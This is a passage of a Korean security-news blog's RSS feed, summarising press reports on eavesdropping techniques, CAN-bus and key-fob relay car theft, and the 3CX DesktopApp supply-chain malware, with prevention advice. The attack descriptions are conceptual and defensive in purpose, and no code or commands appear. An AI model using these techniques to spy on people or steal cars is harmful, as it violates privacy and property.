#333333;&quot;&gt;도청 가능한 취약점 발견. 스피커 장비를 일종의 도청장치로 변화해 주는 취약점 발견.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 범죄자가 무선 통신이 가능할 정도로 장비에 접근하면 백도어를 활용해 계정을 만들고, 원격으로 도청과 감청 명령 가능.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;   예방 : 최신 패치 적용&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;2. 안드로이드 기반 장비 가속도계 이용 ('스피어폰')&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 가속도계(동작 센서)를 활용해 사용자의 대화 내용을 추론하는 도청 방식.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 스마트폰 내 가속도계와 스피커가 가까이 붙어 있는 기기에 한해 스마트폰 본체의 진동 원리를 이용. 음파 정보 분석.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 악성액 설치 또는 악성 웹사이트 방문했을 경우 스마트폰 해킹해 모션센서를 추적해 도청이 이루어짐.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;  &lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;예방 : 센서와 스피커 사이 거리를 충분히 게 벌리면 스피커의 음파 정보가 담기지 않음.&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;3. 레이저 도청장치 이용&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 공격자가 대화를 도청하려는 건물 창문에 레이저 도청장치를 이용해 레이저를 쏘면 창문 안쪽의 음파를 분석 가능&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 사람이 말하는 음파의 경우 건물의 벽이나 창에 부딪히는데 이 진동을 분석해 '언어'로 해석 가능.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;- 최대 10km 안에 있는 대화 해석 가능하고 기기 성능에 따라 수 km밖에서도 도청 가능.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;  &lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;예방 : 진동자와 도청방지 필름 사용. 진동자는 별도의 음파를 생성하는데 민감한 사람은 소음이 들릴 수 있고, 도청방지 필름은 다층구조로 이뤄진 여러 겹의 필름이 음파를 여러 번 반사시키지만 진동자보단 성능이 부족.&lt;/span&gt;&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;박은주 기자, 미&lt;span style=&quot;color: #282828;&quot;&gt;국의 한국 도&amp;middot;감청 의혹 파장! 해킹을 통한 도&amp;middot;감청 위협은 얼마나?, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=117010&amp;amp;page=1&amp;amp;kind=1&quot; target=&quot;_self&quot;&gt;&lt;span&gt;https://www.boannews.com/media/view.asp?idx=117010&amp;amp;page=1&amp;amp;kind=1&lt;/span&gt;&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;미국의 한국 도&amp;middot;감청 의혹 파장! 해킹을 통한 도&amp;middot;감청 위협은 얼마나?&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;우리 생활에는 어떤 도&amp;middot;감청 위협이 도사리고 있으며, 이를 예방하기 위해서는 어떤 조치를 취할 수 있는지 알아봤다. 지난해 벌어진 아파트 월패드 해킹 사건으로 집에서조차 사생활이 유출될&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=117010&amp;amp;page=1&amp;amp;kind=1&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/coTc5M/hySe0zX8Oj/IuS4Sp3ogGwhjxs8KuBPK1/img.jpg?width=1000&amp;amp;height=704&amp;amp;face=0_0_1000_704&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=117010&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=117010&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=117010&amp;amp;page=1&amp;amp;kind=1&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/coTc5M/hySe0zX8Oj/IuS4Sp3ogGwhjxs8KuBPK1/img.jpg?width=1000&amp;amp;height=704&amp;amp;face=0_0_1000_704');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;미국의 한국 도&amp;middot;감청 의혹 파장! 해킹을 통한 도&amp;middot;감청 위협은 얼마나?&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;우리 생활에는 어떤 도&amp;middot;감청 위협이 도사리고 있으며, 이를 예방하기 위해서는 어떤 조치를 취할 수 있는지 알아봤다. 지난해 벌어진 아파트 월패드 해킹 사건으로 집에서조차 사생활이 유출될&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/614</guid>
      <comments>https://jennana.tistory.com/614#entry614comment</comments>
      <pubDate>Wed, 12 Apr 2023 01:42:17 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 사이버 범죄자들, 차량 내 CAN 프로토콜 통해 자동차 훔쳐갔다.</title>
      <link>https://jennana.tistory.com/613</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;1089&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dAB2OT/btr9mkJESEH/eZTaKeXv8Da0P3pSgTJ841/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dAB2OT/btr9mkJESEH/eZTaKeXv8Da0P3pSgTJ841/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dAB2OT/btr9mkJESEH/eZTaKeXv8Da0P3pSgTJ841/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdAB2OT%2Fbtr9mkJESEH%2FeZTaKeXv8Da0P3pSgTJ841%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1080&quot; height=&quot;1089&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;1089&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;CAN이라는 계측 제어기 통신망(Controller Area Network) 이라는 프로토콜은 사물인터넷 관련된 프로토콜로 장비들과 마이크로컨트로러가 상호 소통할 때 사용되는데 자동차 내부의 부품들을 이어 줄 때도 사용되어 해당 프로토콜을 이용한 자동차 해킹 기법이 새로 등장하였다. 해당 프로토콜을 악용해서 달리는 차량을 정지하거나 문과 차량을 열고 잠그고 라디오를 마음대로 조작할 수 있다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;- CAN 프로트콜 : 사이드 브레이크, 헤드라이트, 스마트 키 등과 관련되어 있는 통신 프로토콜.&lt;br&gt;- 가장 대표적인 자동차 해킹 기법 : 무선 열쇠 이용&lt;br&gt;[ 정상적인 연결 ]&lt;br&gt;1) 무선 열쇠에서 신호를 보냄&lt;br&gt;2) 엔진이 해당 신호에 대해 다시 인증 요청&lt;br&gt;3) 무선 열쇠가 응답&lt;br&gt;&lt;br&gt;[ 비정상적인 연결 ]   릴레이 공격 실시&lt;br&gt;1) 해커가 휴대용 무선 릴레이 기지국을 이용해서 차량 근처 무선 열쇠에 쏨.&lt;br&gt;2) 무선 열쇠가 응답을 함&lt;br&gt;3) 해당 응답을 차량에 전달&lt;br&gt;4) 해커가 차량을 통제&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;문정후 기자, 사이버 범죄자들, 차량 내 CAN 프로토콜 통해 자동차 훔쳐갔다, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=116938&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.boannews.com/media/view.asp?idx=116938&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;사이버 범죄자들, 차량 내 CAN 프로토콜 통해 자동차 훔쳐갔다&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;새로운 자동차 해킹 기법이 등장했다. 여기서 가장 핵심적인 역할을 하는 건 CAN이라고 하는 ‘계측 제어기 통신망(Controller Area Network)’이다. CAN은 일종의 사물인터넷 프로토콜로, 장비들과 마이&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116938&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/T1QIq/hySdvgc629/iYFr9Au8r5uR3KSzWsbUZ0/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=116938&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=116938&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116938&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/T1QIq/hySdvgc629/iYFr9Au8r5uR3KSzWsbUZ0/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;사이버 범죄자들, 차량 내 CAN 프로토콜 통해 자동차 훔쳐갔다&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;새로운 자동차 해킹 기법이 등장했다. 여기서 가장 핵심적인 역할을 하는 건 CAN이라고 하는 ‘계측 제어기 통신망(Controller Area Network)’이다. CAN은 일종의 사물인터넷 프로토콜로, 장비들과 마이&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/613</guid>
      <comments>https://jennana.tistory.com/613#entry613comment</comments>
      <pubDate>Mon, 10 Apr 2023 22:19:49 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 3CX DesktopApp에서 공급망 공격 발생</title>
      <link>https://jennana.tistory.com/612</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;911&quot; data-origin-height=&quot;438&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b6ENw5/btr8uTsE8aT/125wY70Hv1Xoh1jnNCRELK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b6ENw5/btr8uTsE8aT/125wY70Hv1Xoh1jnNCRELK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b6ENw5/btr8uTsE8aT/125wY70Hv1Xoh1jnNCRELK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb6ENw5%2Fbtr8uTsE8aT%2F125wY70Hv1Xoh1jnNCRELK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;911&quot; height=&quot;438&quot; data-origin-width=&quot;911&quot; data-origin-height=&quot;438&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;기사 요약 :&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3CX DesktopApp이라는 통화 및 화상회의 소프트웨어가&amp;nbsp; 북한 라자루스로 추정되는 해킹 그룹에게 공급망 공격을 받은 것이 드러났다. 이 공격은 일부 윈도우 및 맥용 버전에서 정상적으로 서명이 된 채 자동 업데이트를 통해서 악성 DLL 파일이 유포되었고 공격자는 이를 통해 정보 탈취 악성코드를 설치하였다고 한다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 3CX 벤더社&lt;/b&gt; : 영상회의 솔루션인 PBX와 기업용 통신앱인 3CX DesktopApp을 제공하는 벤더사. 전 세계 60만 개 기업이 고객사. 매일 1200만 명이 이용하고 있음.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 공격 대상&lt;/b&gt; : 윈도우(Windows) 및 맥(MAC) 사용자.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 공격 방식&lt;/b&gt; : 3CX DesktopApp 설치 파일에 악성코드 삽입. 해당 설치 파일로 설치할 경우 내부 인코딩되어 저장된 악성코드가 메모리 상에 동작하면서 추가 악성코드를 설치.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;743&quot; data-origin-height=&quot;559&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cExFhC/btr8tDp6d1A/lkJvjpZcTQSf1DPwgsO9k0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cExFhC/btr8tDp6d1A/lkJvjpZcTQSf1DPwgsO9k0/img.png&quot; data-alt=&quot;출처 : 안랩 블로그&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cExFhC/btr8tDp6d1A/lkJvjpZcTQSf1DPwgsO9k0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcExFhC%2Fbtr8tDp6d1A%2FlkJvjpZcTQSf1DPwgsO9k0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;743&quot; height=&quot;559&quot; data-origin-width=&quot;743&quot; data-origin-height=&quot;559&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;출처 : 안랩 블로그&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;[윈도우(Windows) 공격 방식]&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 1) MSI 인스톨러 설치 파일. 내부의 &quot;ffmpeg.dll&quot;, &quot;d3dcompiler_47.dll&quot;이 실질적인 악성코드.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 2) 설치가 끝난 후 실행되는 &quot;3CXDesptopApp.exe&quot;는 동일한 경로에 존재하는 &quot;ffmpeg.dll&quot;파일을 로드.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 3) &quot;ffmpeg.dll&quot;은 &quot;d3dcompiler_47.dll&quot; 파일을 읽어와 복호화하여 메모리 상에서 실행하는 기능을 담당.(뒷부분에 인코딩 된 데이터 포함)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 4) &lt;span style=&quot;text-align: start;&quot;&gt;&quot;ffmpeg.dll&quot;는 &quot;d3dcompiler_47.dll&quot;에서 &quot;&lt;span style=&quot;text-align: start;&quot;&gt;FE ED FA CE FE ED FA CE&quot;이라는 시그니처를 찾는데 인코딩 된 데이터가 포함되어 있는데, 복호화하면 쉘코드가 존재하여 메모리상에서 다운로더 기능을 담당하는 악성코드를 실행시킴.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&amp;nbsp; 5) 그러면 악성코드가 깃허브 주소에서 ico 파일(아이콘 파일)을 다운하고 해당 파일의 뒷부분에 실제 C&amp;amp;C 서버 주소가 인코딩 되어 있음. &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&amp;nbsp; 6) 해당 주소는 정보를 탈취하는 인포스틸러의 주소이다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;[맥(MAC) 공격 방식]&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&amp;nbsp; 1) DMG 설치 파일에 악성코드가 삽입.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&amp;nbsp; 2) 설치 파일 내부에 존재하는 공유 라이브러리 파일들 중 libffmpeg.dylib 파일에 C&amp;amp;C 주소가 XOR로 인코딩 되어 있음.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;text-align: start;&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;- 대상 제품 :&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;Electron Windows application shipped in Update 7&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;Electron macOS application&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;18.12.407&lt;br /&gt;18.12.416&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;&lt;span style=&quot;text-align: start;&quot;&gt;18.11.1213&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;text-align: start;&quot;&gt;18.12.402&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;text-align: start;&quot;&gt;18.12.407&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;text-align: start;&quot;&gt;18.12.416&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 해결 방법 :&amp;nbsp;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) 3CX DesktopApp 삭제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) 3CX 업체에서는 PWA 어플리케이션을 대신 사용할 것을 권장&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;김영명 기자, &lt;span style=&quot;color: #282828; letter-spacing: -1px;&quot;&gt;통화&amp;middot;화상회의 등 가능한 3CX DesktopApp에서 공급망 공격 발생, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=116779&amp;amp;kind=1&amp;amp;search=title&amp;amp;find=3cx&quot;&gt;https://www.boannews.com/media/view.asp?idx=116779&amp;amp;kind=1&amp;amp;search=title&amp;amp;find=3cx&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1680802193176&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignLeft&quot; data-og-type=&quot;article&quot; data-og-title=&quot;통화&amp;middot;화상회의 등 가능한 3CX DesktopApp에서 공급망 공격 발생&quot; data-og-description=&quot;3CX DesktopApp을 통해 공급망 공격이 이루어졌다는 내용이 공개됐다. 해당 소프트웨어는 통화, 화상 회의 등 사용자에게 여러 통신 기능을 제공하며 마이크로소프트 윈도(Windows), 애플 맥(MAC) 운영&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116779&amp;amp;kind=1&amp;amp;search=title&amp;amp;find=3cx&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=116779&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/W9Q3z/hySaTnZw9C/G7305Fbbfk1KW6lCnz48tk/img.jpg?width=750&amp;amp;height=576&amp;amp;face=0_0_750_576&quot;&gt;&lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=116779&amp;amp;kind=1&amp;amp;search=title&amp;amp;find=3cx&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116779&amp;amp;kind=1&amp;amp;search=title&amp;amp;find=3cx&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/W9Q3z/hySaTnZw9C/G7305Fbbfk1KW6lCnz48tk/img.jpg?width=750&amp;amp;height=576&amp;amp;face=0_0_750_576');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;통화&amp;middot;화상회의 등 가능한 3CX DesktopApp에서 공급망 공격 발생&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;3CX DesktopApp을 통해 공급망 공격이 이루어졌다는 내용이 공개됐다. 해당 소프트웨어는 통화, 화상 회의 등 사용자에게 여러 통신 기능을 제공하며 마이크로소프트 윈도(Windows), 애플 맥(MAC) 운영&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문정후 기자, &lt;span style=&quot;color: #282828; letter-spacing: -1px;&quot;&gt;3CX 침해 사건, 북한의 라자루스 개입된 거대 공급망 공격 사건?, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=116815&quot;&gt;https://www.boannews.com/media/view.asp?idx=116815&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1680802248239&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;3CX 침해 사건, 북한의 라자루스 개입된 거대 공급망 공격 사건?&quot; data-og-description=&quot;북한의 라자루스(Lazarus)로 추정되는 해킹 그룹이 최근 3CX의 VoIP 데스크톱 애플리케이션을 침해함으로써 정보 탈취용 멀웨어를 3CX의 고객사에 퍼트리고 있다는 사실이 드러났다. 일부 3CX 고객사&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116815&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=116815&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/vpMye/hySaWydspS/rmo8I0BElimcl0qrd6OxF1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot;&gt;&lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=116815&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116815&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/vpMye/hySaWydspS/rmo8I0BElimcl0qrd6OxF1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;3CX 침해 사건, 북한의 라자루스 개입된 거대 공급망 공격 사건?&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;북한의 라자루스(Lazarus)로 추정되는 해킹 그룹이 최근 3CX의 VoIP 데스크톱 애플리케이션을 침해함으로써 정보 탈취용 멀웨어를 3CX의 고객사에 퍼트리고 있다는 사실이 드러났다. 일부 3CX 고객사&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안랩 블로그,&amp;nbsp;3CX DesktopApp 사용 주의 (CVE-2023-29059), &lt;a href=&quot;https://asec.ahnlab.com/ko/50797/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://asec.ahnlab.com/ko/50797/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1680802275149&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;3CX DesktopApp 사용 주의 (CVE-2023-29059) - ASEC BLOG&quot; data-og-description=&quot;개요 3CX DesktopApp을 통해 공급망 공격이 이루어졌다는 내용이 공개되었다.[1] 해당 소프트웨어는 통화, 화상 회의 등 사용자에게 여러 통신 기능을 제공하며 Windows, MAC 운영체제 환경에서 구동이 &quot; data-og-host=&quot;asec.ahnlab.com&quot; data-og-source-url=&quot;https://asec.ahnlab.com/ko/50797/&quot; data-og-url=&quot;http://asec.ahnlab.com/ko/50797/&quot; 